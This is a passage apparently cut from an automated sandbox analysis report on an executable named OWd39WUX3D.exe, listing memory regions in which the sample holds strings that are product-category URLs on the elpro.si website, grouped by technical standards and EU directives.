00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-53-eu/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60584/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60751/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/ams-2750/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/cqi/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/din-en-301-489/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-12830/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-13060/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-285/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/fcm-ec-1935-2004/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-11140-4/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-15883/
